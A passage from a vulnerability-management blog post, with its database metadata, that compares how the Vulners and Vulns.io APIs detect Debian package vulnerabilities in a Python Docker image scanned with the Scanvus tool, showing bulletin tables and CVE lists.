+----+----------+-------------------------+----------------+----------------------------------------------------+\n | 13 | High | DEBIAN:DSA-5147-1:638F9 | CVE-2022-1664 | dpkg 1.20.9 amd64 < 1.20.10 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 14 | Medium | DEBIAN:DLA-2766-1:9EFDC | CVE-2021-3712 | libssl1.1 1.1.1k-1 amd64 < 1.1.1k-1+deb11u1 |\n | | | | | openssl 1.1.1k-1 amd64 < 1.1.1k-1+deb11u1 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 15 | Medium | DEBIAN:DLA-2771-1:D1964 | 
CVE-2018-20217 | libk5crypto3 1.18.3-6 amd64 < 1.18.3-6+deb11u1 |\n | | | | CVE-2018-5729 | libkrb5-3 1.18.3-6 amd64 < 1.18.3-6+deb11u1 |\n | | | | CVE-2018-5730 | libgssapi-krb5-2 1.18.3-6 amd64 < 1.18.3-6+deb11u1 |\n | | | | CVE-2021-37750 | libkrb5support0 1.18.3-6 amd64 < 1.18.3-6+deb11u1 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 16 | Medium | DEBIAN:DLA-2774-1:D8CE0 | CVE-2021-3712 | libssl1.1 1.1.1k-1 amd64 < 1.1.1k-1+deb11u1 |\n | | | | | openssl 1.1.1k-1 amd64 < 1.1.1k-1+deb11u1 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 17 | Medium | DEBIAN:DLA-2952-1:7651B | CVE-2019-1551 | libssl1.1 1.1.1k-1 amd64 < 1.1.1k-1+deb11u2 |\n | | | | CVE-2022-0778 | openssl 1.1.1k-1 amd64 < 1.1.1k-1+deb11u2 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 18 | Medium | DEBIAN:DLA-2953-1:551CB | CVE-2022-0778 | libssl1.1 1.1.1k-1 amd64 < 1.1.1k-1+deb11u2 |\n | | | | | openssl 1.1.1k-1 amd64 < 1.1.1k-1+deb11u2 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 19 | Medium | DEBIAN:DLA-3206-1:5481E | CVE-2019-14870 | libk5crypto3 1.18.3-6 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2021-3671 | libkrb5-3 1.18.3-6 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2021-44758 | libgssapi-krb5-2 1.18.3-6 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-3437 | libkrb5support0 1.18.3-6 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-41916 | |\n | | | | CVE-2022-42898 | |\n | | | | CVE-2022-44640 | |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 20 | Medium | DEBIAN:DSA-5103-1:C47DD | CVE-2021-4160 | libssl1.1 1.1.1k-1 amd64 < 1.1.1k-1+deb11u2 |\n | | | | CVE-2022-0778 | openssl 1.1.1k-1 amd64 < 1.1.1k-1+deb11u2 |\n 
+----+----------+-------------------------+----------------+----------------------------------------------------+\n | 21 | Medium | DEBIAN:DSA-5174-1:32717 | CVE-2022-34903 | gpgv 2.2.27-2 amd64 < 2.2.27-2+deb11u2 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 22 | Medium | DEBIAN:DSA-5287-1:12BD4 | CVE-2021-3671 | libk5crypto3 1.18.3-6 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2021-44758 | libkrb5-3 1.18.3-6 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-3437 | libgssapi-krb5-2 1.18.3-6 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-41916 | libkrb5support0 1.18.3-6 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-42898 | |\n | | | | CVE-2022-44640 | |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n \n \n \n $ python3.8 scanvus.py --audit-service vulnsio --assessment-type \"docker_image\" --docker-image \"python:3.9.6-slim-bullseye\" \n /$$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$ /$$/$$ /$$ /$$$$$$$\n /$$_____/ /$$_____/ |____ $$| $$__ $$| $$ /$$/ $$ | $$ /$$_____/\n | $$$$$$ | $$ /$$$$$$$| $$ \\ $$ \\ $$/$$/| $$ | $$| $$$$$$ \n \\____ $$| $$ /$$__ $$| $$ | $$ \\ $$$/ | $$ | $$ \\____ $$\n /$$$$$$$/| $$$$$$$| $$$$$$$| $$ | $$ \\ $/ | $$$$$$/ /$$$$$$$/\n |_______/ \\_______/ \\_______/|__/ |__/ \\_/ \\______/ |_______/ \n Getting assessment target...\n assessment_type: docker_image\n docker_image: python:3.9.6-slim-bullseye\n Getting OS inventory data...\n os_name: debian\n os_version: 11\n package_list_len: 105\n Getting vulnerability data...\n Getting vulnerability report...\n -------------\n Vulnerability Report for python:3.9.6-slim-bullseye (docker_image, debian 11, linux kernel 5.4.0-135-generic, 105 packages)\n 19 vulnerabilities with levels ['Critical', 'High', 'Medium'] were found\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | N | Level | Bulletin | CVE | 
Proof |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 1 | Critical | DSA-4963-1 | CVE-2021-3711 | libssl1.1-1.1.1k-1.amd64 < 0:1.1.1k-1+deb11u1 |\n | | | | CVE-2021-3712 | openssl-1.1.1k-1.amd64 < 0:1.1.1k-1+deb11u1 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 2 | Critical | DSA-5073-1 | CVE-2022-23852 | libexpat1-2.2.10-2.amd64 < 0:2.2.10-2+deb11u1 |\n | | | | CVE-2022-23990 | |\n | | | | CVE-2021-46143 | |\n | | | | CVE-2022-22824 | |\n | | | | CVE-2022-22827 | |\n | | | | CVE-2021-45960 | |\n | | | | CVE-2022-22822 | |\n | | | | CVE-2022-22825 | |\n | | | | CVE-2022-22823 | |\n | | | | CVE-2022-22826 | |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 3 | Critical | DSA-5085-1 | CVE-2022-25236 | libexpat1-2.2.10-2.amd64 < 0:2.2.10-2+deb11u2 |\n | | | | CVE-2022-25314 | |\n | | | | CVE-2022-25235 | |\n | | | | CVE-2022-25315 | |\n | | | | CVE-2022-25313 | |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 4 | Critical | DSA-5139-1 | CVE-2022-1292 | libssl1.1-1.1.1k-1.amd64 < 0:1.1.1n-0+deb11u2 |\n | | | | | openssl-1.1.1k-1.amd64 < 0:1.1.1n-0+deb11u2 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 5 | Critical | DSA-5147-1 | CVE-2022-1664 | dpkg-1.20.9.amd64 < 0:1.20.10 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 6 | Critical | DSA-5169-1 | CVE-2022-2068 | libssl1.1-1.1.1k-1.amd64 < 0:1.1.1n-0+deb11u3 |\n | | | | | openssl-1.1.1k-1.amd64 < 0:1.1.1n-0+deb11u3 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 7 | Critical | DSA-5218-1 | CVE-2022-37434 | zlib1g-1:1.2.11.dfsg-2.amd64 < 
1:1.2.11.dfsg-2+deb11u2 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 8 | Critical | DSA-5236-1 | CVE-2022-40674 | libexpat1-2.2.10-2.amd64 < 0:2.2.10-2+deb11u4 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 9 | Critical | no advisory | CVE-2022-23218 | libc-bin-2.31-13.amd64 < 0:2.31-13+deb11u3 |\n | | | | CVE-2022-46908 | libc6-2.31-13.amd64 < 0:2.31-13+deb11u3 |\n | | | | CVE-2019-1010022 | libdb5.3-5.3.28+dfsg1-0.8.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-23219 | libpcre2-8-0-10.36-2.amd64 < 0:10.36-2+deb11u1 |\n | | | | CVE-2019-8457 | libsqlite3-0-3.34.1-3.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-33574 | libtasn1-6-4.16.0-2.amd64 < 0:4.16.0-2+deb11u1 |\n | | | | CVE-2005-2541 | tar-1.34+dfsg-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1587 | |\n | | | | CVE-2022-1586 | |\n | | | | CVE-2021-46848 | |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 10 | High | DSA-5103-1 | CVE-2022-0778 | libssl1.1-1.1.1k-1.amd64 < 0:1.1.1k-1+deb11u2 |\n | | | | CVE-2021-4160 | openssl-1.1.1k-1.amd64 < 0:1.1.1k-1+deb11u2 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 11 | High | DSA-5111-1 | CVE-2018-25032 | zlib1g-1:1.2.11.dfsg-2.amd64 < 1:1.2.11.dfsg-2+deb11u1 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 12 | High | DSA-5122-1 | CVE-2022-1271 | gzip-1.10-4.amd64 < 0:1.10-4+deb11u1 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 13 | High | DSA-5123-1 | CVE-2022-1271 | liblzma5-5.2.5-2.amd64 < 0:5.2.5-2.1~deb11u1 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 14 | High | DSA-5200-1 | CVE-2021-46828 | 
libtirpc-common-1.3.1-1.all < 0:1.3.1-1+deb11u1 |\n | | | | | libtirpc3-1.3.1-1.amd64 < 0:1.3.1-1+deb11u1 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 15 | High | DSA-5203-1 | CVE-2022-2509 | libgnutls30-3.7.1-5.amd64 < 0:3.7.1-5+deb11u2 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 16 | High | no advisory | CVE-2022-29458 | e2fsprogs-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2018-6829 | libcom-err2-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-43618 | libext2fs2-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-20838 | libss2-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-36690 | logsave-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-19882 | libc-bin-2.31-13.amd64 < 0:2.31-13+deb11u3 |\n | | | | CVE-2011-4116 | libc6-2.31-13.amd64 < 0:2.31-13+deb11u3 |\n | | | | CVE-2022-1304 | libexpat1-2.2.10-2.amd64 < 0:2.2.10-2+deb11u5 |\n | | | | CVE-2017-7246 | libgcrypt20-1.8.7-6.amd64 >= 0:0.0.0 |\n | | | | CVE-2018-20796 | libgmp10-2:6.2.1+dfsg-1.amd64 < 2:6.2.1+dfsg-1+deb11u1 |\n | | | | CVE-2019-1010023 | libgssapi-krb5-2-1.18.3-6.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-39537 | libk5crypto3-1.18.3-6.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-16156 | libkrb5-3-1.18.3-6.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-43680 | libkrb5support0-1.18.3-6.amd64 >= 0:0.0.0 |\n | | | | CVE-2018-5709 | libncursesw6-6.2+20201114-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-9192 | libtinfo6-6.2+20201114-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-3999 | ncurses-base-6.2+20201114-2.all >= 0:0.0.0 |\n | | | | CVE-2017-7245 | ncurses-bin-6.2+20201114-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-11164 | libpcre3-2:8.39-13.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-35737 | libsqlite3-0-3.34.1-3.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-43396 | login-1:4.8.1-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-33560 | passwd-1:4.8.1-1.amd64 >= 0:0.0.0 |\n | | | | | perl-base-5.32.1-4+deb11u1.amd64 >= 
0:0.0.0 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 17 | Medium | DSA-5055-1 | CVE-2021-3996 | bsdutils-1:2.36.1-8.amd64 < 0:2.36.1-8+deb11u1 |\n | | | | CVE-2021-3995 | libblkid1-2.36.1-8.amd64 < 0:2.36.1-8+deb11u1 |\n | | | | | libmount1-2.36.1-8.amd64 < 0:2.36.1-8+deb11u1 |\n | | | | | libsmartcols1-2.36.1-8.amd64 < 0:2.36.1-8+deb11u1 |\n | | | | | libuuid1-2.36.1-8.amd64 < 0:2.36.1-8+deb11u1 |\n | | | | | mount-2.36.1-8.amd64 < 0:2.36.1-8+deb11u1 |\n | | | | | util-linux-2.36.1-8.amd64 < 0:2.36.1-8+deb11u1 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 18 | Medium | DSA-5174-1 | CVE-2022-34903 | gpgv-2.2.27-2.amd64 < 0:2.2.27-2+deb11u2 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 19 | Medium | no advisory | CVE-2022-2097 | bash-5.1-2+b3.amd64 >= 0:0.0.0 |\n | | | | CVE-2013-4235 | bsdutils-1:2.36.1-8.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-1010024 | libblkid1-2.36.1-8.amd64 >= 0:0.0.0 |\n | | | | CVE-2010-0928 | libmount1-2.36.1-8.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-4209 | libsmartcols1-2.36.1-8.amd64 >= 0:0.0.0 |\n | | | | CVE-2016-2781 | libuuid1-2.36.1-8.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-16231 | mount-2.36.1-8.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-42898 | util-linux-2.36.1-8.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-18018 | coreutils-8.32-4+b1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-45346 | libc-bin-2.31-13.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-37750 | libc6-2.31-13.amd64 >= 0:0.0.0 |\n | | | | CVE-2007-6755 | libexpat1-2.2.10-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2010-4756 | libgnutls30-3.7.1-5.amd64 >= 0:0.0.0 |\n | | | | CVE-2013-0340 | libgssapi-krb5-2-1.18.3-6.amd64 < 0:1.18.3-6+deb11u1 |\n | | | | CVE-2021-3997 | libk5crypto3-1.18.3-6.amd64 < 0:1.18.3-6+deb11u1 |\n | | | | CVE-2011-3389 | libkrb5-3-1.18.3-6.amd64 < 0:1.18.3-6+deb11u1 |\n | | | | 
CVE-2022-3715 | libkrb5support0-1.18.3-6.amd64 < 0:1.18.3-6+deb11u1 |\n | | | | CVE-2022-0563 | libpcre3-2:8.39-13.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-13529 | libsqlite3-0-3.34.1-3.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-4415 | libssl1.1-1.1.1k-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-1010025 | openssl-1.1.1k-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2007-5686 | libsystemd0-247.3-6.amd64 < 0:247.3-7 |\n | | | | | libudev1-247.3-6.amd64 < 0:247.3-7 |\n | | | | | login-1:4.8.1-1.amd64 >= 0:0.0.0 |\n | | | | | passwd-1:4.8.1-1.amd64 >= 0:0.0.0 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n \n\nIn this case, more vulnerabilities were detected. We can also see a big difference in the results, but there is already some intersection of the sets.\n \n \n **Vulners \u2216 VulnsIO:** 13 {'DSA-5287-1', 'DLA-2771-1', 'DLA-2904-1', 'DLA-3022-1', 'DLA-3206-1', 'DLA-2766-1', 'DLA-2935-1', 'DLA-2774-1', 'DLA-3008-1', 'DLA-3152-1', 'DLA-2953-1', 'DSA-5085-2', 'DLA-2952-1'}\n **Vulners \u2229 VulnsIO:** 8 {'DSA-5147-1', 'DSA-5073-1', 'DSA-5174-1', 'DSA-4963-1', 'DSA-5169-1', 'DSA-5139-1', 'DSA-5085-1', 'DSA-5103-1'}\n **VulnsIO \u2216 Vulners:** 8 {'DSA-5111-1', 'DSA-5055-1', 'DSA-5123-1', 'DSA-5122-1', 'DSA-5236-1', 'DSA-5203-1', 'DSA-5218-1', 'DSA-5200-1'}\n\nWe can look at one bulletin that was detected by two APIs.\n\nVulners:\n \n \n | 13 | High | DEBIAN:DSA-5147-1:638F9 | CVE-2022-1664 | dpkg 1.20.9 amd64 < 1.20.10 |\n\nVulns.io:\n \n \n | 5 | Critical | DSA-5147-1 | CVE-2022-1664 | dpkg-1.20.9.amd64 < 0:1.20.10 |\n\nAs you can see from the proofs, the detection criteria are the same. And this is good. I would also like to draw attention to the different values of the criticality level for the bulletin. [Debian does not provide](<https://www.debian.org/security/2022/dsa-5147>) this criticality level; apparently it is calculated by the vendors based on CVSS, but in different ways. 
\n\n## What's next?\n\nAs we can see, support for the Vulners.com and Vulns.io APIs in Scanvus opens up new opportunities for testing the correctness of the detection for all supported Linux distributions.\n\nCurrently, support for the Vulners.com API and support for the Vulns.io API are implemented equally, but they are implemented independently. The bash inventory scripts for each of the APIs are different. Two independent reporting functions are also used. It seems right to **unify the inventory script** so that the same inventory results can be checked with Vulners.com and Vulns.io. It also seems right to create a **single format for presenting detection results** and convert raw results from APIs into this format. This format could be used for reporting and further integrations. In this way, it will be possible to debug the scheme for adding new APIs to Scanvus.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-12-30T18:03:13", "type": "avleonov", "title": "Scanvus now supports Vulners and Vulns.io VM Linux vulnerability detection APIs", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0230", 
"CVE-2005-2541", "CVE-2005-3660", "CVE-2007-2243", "CVE-2007-2768", "CVE-2007-5686", "CVE-2007-6755", "CVE-2008-2544", "CVE-2008-3234", "CVE-2008-4609", "CVE-2008-4677", "CVE-2008-4996", "CVE-2008-5135", "CVE-2008-5366", "CVE-2008-5367", "CVE-2010-0928", "CVE-2010-4563", "CVE-2010-4756", "CVE-2010-5321", "CVE-2011-3389", "CVE-2011-4116", "CVE-2011-4915", "CVE-2011-4916", "CVE-2011-4917", "CVE-2012-0039", "CVE-2012-2663", "CVE-2012-4542", "CVE-2013-0340", "CVE-2013-4235", "CVE-2013-7445", "CVE-2014-9892", "CVE-2014-9900", "CVE-2015-20107", "CVE-2015-3243", "CVE-2015-3276", "CVE-2016-10228", "CVE-2016-10723", "CVE-2016-1585", "CVE-2016-20012", "CVE-2016-2568", "CVE-2016-2781", "CVE-2016-3709", "CVE-2016-8660", "CVE-2016-9797", "CVE-2016-9798", "CVE-2016-9799", "CVE-2016-9800", "CVE-2016-9801", "CVE-2016-9802", "CVE-2016-9803", "CVE-2016-9804", "CVE-2016-9917", "CVE-2016-9918", "CVE-2017-0630", "CVE-2017-1000382", "CVE-2017-11164", "CVE-2017-13084", "CVE-2017-13693", "CVE-2017-13694", "CVE-2017-14159", "CVE-2017-15131", "CVE-2017-16231", "CVE-2017-17740", "CVE-2017-18018", "CVE-2017-7245", "CVE-2017-7246", "CVE-2018-1000500", "CVE-2018-1121", "CVE-2018-12928", "CVE-2018-15919", "CVE-2018-17977", "CVE-2018-20217", "CVE-2018-20796", "CVE-2018-25032", "CVE-2018-5709", "CVE-2018-5729", "CVE-2018-5730", "CVE-2018-6829", "CVE-2018-7738", "CVE-2019-1010022", "CVE-2019-1010023", "CVE-2019-1010024", "CVE-2019-1010025", "CVE-2019-12378", "CVE-2019-12379", "CVE-2019-12380", "CVE-2019-12381", "CVE-2019-12382", "CVE-2019-12455", "CVE-2019-12456", "CVE-2019-14870", "CVE-2019-15213", "CVE-2019-15232", "CVE-2019-1551", "CVE-2019-15794", "CVE-2019-16089", "CVE-2019-16229", "CVE-2019-16230", "CVE-2019-16231", "CVE-2019-16232", "CVE-2019-16233", "CVE-2019-16234", "CVE-2019-19070", "CVE-2019-19126", "CVE-2019-19378", "CVE-2019-19449", "CVE-2019-19814", "CVE-2019-19882", "CVE-2019-20794", "CVE-2019-20838", "CVE-2019-25013", "CVE-2019-5062", "CVE-2019-6110", "CVE-2019-6129", 
"CVE-2019-8457", "CVE-2019-9192", "CVE-2020-0347", "CVE-2020-10029", "CVE-2020-11725", "CVE-2020-12362", "CVE-2020-12363", "CVE-2020-12364", "CVE-2020-12389", "CVE-2020-12390", "CVE-2020-13529", "CVE-2020-13576", "CVE-2020-14145", "CVE-2020-14304", "CVE-2020-15719", "CVE-2020-15778", "CVE-2020-15802", "CVE-2020-16156", "CVE-2020-1752", "CVE-2020-24504", "CVE-2020-26140", "CVE-2020-26142", "CVE-2020-26143", "CVE-2020-26555", "CVE-2020-26557", "CVE-2020-26559", "CVE-2020-26560", "CVE-2020-26972", "CVE-2020-27618", "CVE-2020-27619", "CVE-2020-36325", "CVE-2020-36516", "CVE-2020-6096", "CVE-2021-21240", "CVE-2021-21783", "CVE-2021-22922", "CVE-2021-22923", "CVE-2021-26934", "CVE-2021-27645", "CVE-2021-28831", "CVE-2021-28861", "CVE-2021-29462", "CVE-2021-29921", "CVE-2021-30004", "CVE-2021-30475", "CVE-2021-31879", "CVE-2021-32078", "CVE-2021-33061", "CVE-2021-3326", "CVE-2021-33560", "CVE-2021-33574", "CVE-2021-3426", "CVE-2021-3468", "CVE-2021-3502", "CVE-2021-35942", "CVE-2021-3658", "CVE-2021-3669", "CVE-2021-36690", "CVE-2021-3671", "CVE-2021-3695", "CVE-2021-3696", "CVE-2021-3697", "CVE-2021-3711", "CVE-2021-3712", "CVE-2021-3714", "CVE-2021-3733", "CVE-2021-3737", "CVE-2021-3759", "CVE-2021-3773", "CVE-2021-37750", "CVE-2021-38185", "CVE-2021-3847", "CVE-2021-3864", "CVE-2021-3872", "CVE-2021-3903", "CVE-2021-3927", "CVE-2021-3928", "CVE-2021-39537", "CVE-2021-3968", "CVE-2021-39686", "CVE-2021-3973", "CVE-2021-3974", "CVE-2021-3984", "CVE-2021-3995", "CVE-2021-3996", "CVE-2021-3997", "CVE-2021-3999", "CVE-2021-4019", "CVE-2021-4023", "CVE-2021-4037", "CVE-2021-4069", "CVE-2021-4115", "CVE-2021-41229", "CVE-2021-4136", "CVE-2021-4149", "CVE-2021-4160", "CVE-2021-41617", "CVE-2021-4166", "CVE-2021-4173", "CVE-2021-4187", "CVE-2021-4189", "CVE-2021-4192", "CVE-2021-4193", "CVE-2021-4204", "CVE-2021-4209", "CVE-2021-4214", "CVE-2021-42373", "CVE-2021-42374", "CVE-2021-42375", "CVE-2021-42376", "CVE-2021-42377", "CVE-2021-42378", "CVE-2021-42379", "CVE-2021-42380", 
"CVE-2021-42381", "CVE-2021-42382", "CVE-2021-42383", "CVE-2021-42384", "CVE-2021-42385", "CVE-2021-42386", "CVE-2021-43396", "CVE-2021-43400", "CVE-2021-43618", "CVE-2021-44758", "CVE-2021-44879", "CVE-2021-45346", "CVE-2021-45940", "CVE-2021-45941", "CVE-2021-45951", "CVE-2021-45952", "CVE-2021-45953", "CVE-2021-45954", "CVE-2021-45955", "CVE-2021-45956", "CVE-2021-45957", "CVE-2021-45960", "CVE-2021-46143", "CVE-2021-46828", "CVE-2021-46848", "CVE-2022-0156", "CVE-2022-0171", "CVE-2022-0204", "CVE-2022-0213", "CVE-2022-0261", "CVE-2022-0318", "CVE-2022-0319", "CVE-2022-0351", "CVE-2022-0359", "CVE-2022-0361", "CVE-2022-0368", "CVE-2022-0391", "CVE-2022-0392", "CVE-2022-0393", "CVE-2022-0400", "CVE-2022-0407", "CVE-2022-0408", "CVE-2022-0413", "CVE-2022-0417", "CVE-2022-0443", "CVE-2022-0480", "CVE-2022-0500", "CVE-2022-0554", "CVE-2022-0563", "CVE-2022-0572", "CVE-2022-0629", "CVE-2022-0685", "CVE-2022-0696", "CVE-2022-0714", "CVE-2022-0729", "CVE-2022-0778", "CVE-2022-0934", "CVE-2022-0943", "CVE-2022-1154", "CVE-2022-1184", "CVE-2022-1247", "CVE-2022-1253", "CVE-2022-1271", "CVE-2022-1280", "CVE-2022-1292", "CVE-2022-1304", "CVE-2022-1420", "CVE-2022-1462", "CVE-2022-1586", "CVE-2022-1587", "CVE-2022-1616", "CVE-2022-1619", "CVE-2022-1620", "CVE-2022-1621", "CVE-2022-1629", "CVE-2022-1664", "CVE-2022-1674", "CVE-2022-1679", "CVE-2022-1720", "CVE-2022-1733", "CVE-2022-1735", "CVE-2022-1769", "CVE-2022-1771", "CVE-2022-1785", "CVE-2022-1796", "CVE-2022-1851", "CVE-2022-1882", "CVE-2022-1886", "CVE-2022-1897", "CVE-2022-1898", "CVE-2022-1927", "CVE-2022-1942", "CVE-2022-1968", "CVE-2022-2000", "CVE-2022-2042", "CVE-2022-2068", "CVE-2022-2097", "CVE-2022-2124", "CVE-2022-2125", "CVE-2022-2126", "CVE-2022-2129", "CVE-2022-21505", "CVE-2022-2153", "CVE-2022-2175", "CVE-2022-2182", "CVE-2022-2183", "CVE-2022-2206", "CVE-2022-2207", "CVE-2022-2208", "CVE-2022-2210", "CVE-2022-2231", "CVE-2022-2257", "CVE-2022-2264", "CVE-2022-22822", "CVE-2022-22823", 
"CVE-2022-22824", "CVE-2022-22825", "CVE-2022-22826", "CVE-2022-22827", "CVE-2022-2284", "CVE-2022-2285", "CVE-2022-2286", "CVE-2022-2287", "CVE-2022-2289", "CVE-2022-2304", "CVE-2022-23218", "CVE-2022-23219", "CVE-2022-23303", "CVE-2022-23304", "CVE-2022-2343", "CVE-2022-2344", "CVE-2022-2345", "CVE-2022-23816", "CVE-2022-23825", "CVE-2022-23852", "CVE-2022-23990", "CVE-2022-24791", "CVE-2022-2509", "CVE-2022-2522", "CVE-2022-25235", "CVE-2022-25236", "CVE-2022-25265", "CVE-2022-25313", "CVE-2022-25314", "CVE-2022-25315", "CVE-2022-2571", "CVE-2022-2581", "CVE-2022-2585", "CVE-2022-2586", "CVE-2022-2588", "CVE-2022-2598", "CVE-2022-2602", "CVE-2022-26373", "CVE-2022-2795", "CVE-2022-2816", "CVE-2022-2817", "CVE-2022-2819", "CVE-2022-28391", "CVE-2022-2845", "CVE-2022-2849", "CVE-2022-2862", "CVE-2022-2873", "CVE-2022-28733", "CVE-2022-28734", "CVE-2022-28735", "CVE-2022-28736", "CVE-2022-2874", "CVE-2022-2889", "CVE-2022-2923", "CVE-2022-2928", "CVE-2022-2929", "CVE-2022-29458", "CVE-2022-2946", "CVE-2022-29900", "CVE-2022-29901", "CVE-2022-30065", "CVE-2022-3061", "CVE-2022-3080", "CVE-2022-3176", "CVE-2022-31782", "CVE-2022-3297", "CVE-2022-33070", "CVE-2022-3344", "CVE-2022-3424", "CVE-2022-3437", "CVE-2022-34903", "CVE-2022-3491", "CVE-2022-3534", "CVE-2022-3542", "CVE-2022-35737", "CVE-2022-3586", "CVE-2022-3606", "CVE-2022-3628", "CVE-2022-36879", "CVE-2022-36946", "CVE-2022-3707", "CVE-2022-3715", "CVE-2022-37434", "CVE-2022-37454", "CVE-2022-3775", "CVE-2022-38177", "CVE-2022-38178", "CVE-2022-3857", "CVE-2022-40674", "CVE-2022-4095", "CVE-2022-4139", "CVE-2022-41916", "CVE-2022-42328", "CVE-2022-42329", "CVE-2022-42898", "CVE-2022-42919", "CVE-2022-43551", "CVE-2022-43552", "CVE-2022-43680", "CVE-2022-4378", "CVE-2022-4415", "CVE-2022-44640", "CVE-2022-4543", "CVE-2022-4662", "CVE-2022-46908"], "modified": "2022-12-30T18:03:13", "id": "AVLEONOV:317FBD7DA93C95993A9FFF38FB04A987", "href": 
"https://avleonov.com/2022/12/30/scanvus-now-supports-vulners-and-vulns-io-vm-linux-vulnerability-detection-apis/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}